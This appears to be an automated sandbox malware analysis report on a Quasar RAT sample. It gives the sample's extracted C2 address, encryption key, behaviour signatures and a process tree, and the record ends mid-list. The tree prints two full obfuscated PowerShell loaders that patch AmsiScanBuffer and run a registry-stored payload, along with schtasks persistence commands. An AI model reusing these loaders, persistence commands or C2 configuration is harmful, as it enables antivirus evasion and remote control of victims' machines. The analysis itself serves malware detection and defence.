Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:604
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1016
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{cee226f3-5638-4237-8db0-7b049eb134e1}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:992
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2d8c6bf9-d439-481b-8d6b-c8947eb66d94}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:460
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:668
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:944
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:504
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:1032
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
            1⤵
              PID:1084
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1092
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1176
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1200
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2648
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xahyVwhQyfIQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cbOJMOiFZBNgHT,[Parameter(Position=1)][Type]$gvWNqQpomU)$jTCyHZXQwOC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+'dD'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+'p'+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+'S'+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$jTCyHZXQwOC.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+[Char](83)+'i'+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$cbOJMOiFZBNgHT).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');$jTCyHZXQwOC.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'BySig'+','+'N'+[Char](101)+''+[Char](119)+'Sl'+'o'+'t,V'+'i'+''+'r'+'t'+'u'+'a'+[Char](108)+'',$gvWNqQpomU,$cbOJMOiFZBNgHT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $jTCyHZXQwOC.CreateType();}$CyXzlczzUpHyP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+'sof'+[Char](116)+'.Wi'+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$EmazgtawrBlZJV=$CyXzlczzUpHyP.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jIQFQvuPpbVdiaRQZmv=xahyVwhQyfIQ @([String])([IntPtr]);$yMLxmaYbEDFFvevYBXeiTl=xahyVwhQyfIQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PPBgFtZAPur=$CyXzlczzUpHyP.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+'d'+'u'+''+'l'+'e'+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+'l'+'32'+[Char](46)+'d'+'l'+''+'l'+'')));$BmlNvfAlZTunvd=$EmazgtawrBlZJV.Invoke($Null,@([Object]$PPBgFtZAPur,[Object](''+'L'+''+[Char](111)+'ad'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$gJKxMzAWQMoAOoFcD=$EmazgtawrBlZJV.Invoke($Null,@([Object]$PPBgFtZAPur,[Object](''+[Char](86)+'ir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'te'+[Char](99)+'t')));$mjAOhSq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BmlNvfAlZTunvd,$jIQFQvuPpbVdiaRQZmv).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$HLRCrwWIQavdVpRmt=$EmazgtawrBlZJV.Invoke($Null,@([Object]$mjAOhSq,[Object](''+'A'+''+'m'+'si'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+'f'+'e'+[Char](114)+'')));$htKxzqxXqI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gJKxMzAWQMoAOoFcD,$yMLxmaYbEDFFvevYBXeiTl).Invoke($HLRCrwWIQavdVpRmt,[uint32]8,4,[ref]$htKxzqxXqI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLRCrwWIQavdVpRmt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gJKxMzAWQMoAOoFcD,$yMLxmaYbEDFFvevYBXeiTl).Invoke($HLRCrwWIQavdVpRmt,[uint32]8,0x20,[ref]$htKxzqxXqI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'TW'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3776
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZSoEmkqHXMoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CNJqMyRQiZJzBg,[Parameter(Position=1)][Type]$zEEYHSLHQX)$jsazyWUUNNR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+'d'+','+''+[Char](65)+''+[Char](110)+''+'s'+'iC'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$jsazyWUUNNR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$CNJqMyRQiZJzBg).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');$jsazyWUUNNR.DefineMethod('I'+'n'+'vo'+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+','+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+'S'+'i'+'g'+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$zEEYHSLHQX,$CNJqMyRQiZJzBg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $jsazyWUUNNR.CreateType();}$KxjjcjftyPVgg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+'t'+[Char](105)+'v'+'e'+''+'M'+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$ynHmzwOvwqPYCU=$KxjjcjftyPVgg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$puhzMpNjGTtNKWLAcbo=ZSoEmkqHXMoT @([String])([IntPtr]);$kUCjhlaLXIBdTxVvXrbSOH=ZSoEmkqHXMoT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kvkfpyyBXkr=$KxjjcjftyPVgg.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$KBLCsjaJSGouxq=$ynHmzwOvwqPYCU.Invoke($Null,@([Object]$kvkfpyyBXkr,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'Li'+'b'+'r'+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$UxxVaiHNsLOAsLMgH=$ynHmzwOvwqPYCU.Invoke($Null,@([Object]$kvkfpyyBXkr,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$xqnwHTF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KBLCsjaJSGouxq,$puhzMpNjGTtNKWLAcbo).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$YVUiExEuMDprElJpO=$ynHmzwOvwqPYCU.Invoke($Null,@([Object]$xqnwHTF,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$XxOfmjJSmD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxxVaiHNsLOAsLMgH,$kUCjhlaLXIBdTxVvXrbSOH).Invoke($YVUiExEuMDprElJpO,[uint32]8,4,[ref]$XxOfmjJSmD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YVUiExEuMDprElJpO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxxVaiHNsLOAsLMgH,$kUCjhlaLXIBdTxVvXrbSOH).Invoke($YVUiExEuMDprElJpO,[uint32]8,0x20,[ref]$XxOfmjJSmD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+'st'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1248
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:396
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1268
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1300
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1344
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1404
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1424
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2520
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1492
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1504
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1632
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1688
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1756
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1780
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1896
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:2024
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2040
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1608
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                      PID:1712
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2108
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2136
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2288
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2440
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2560
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                1⤵
                                                                  PID:2684
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2692
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2720
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2912
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2952
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2972
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2984
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2996
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3188
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3296
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3524
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:5028
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4040
                                                                                      • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2528
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1836
                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2896
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4980
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4436
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3648
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3836
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4048
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3952
                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4860
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:4608
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4956
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:3016
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:1220
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1940
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2780
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:1700
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                        1⤵
                                                                                                          PID:1564
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
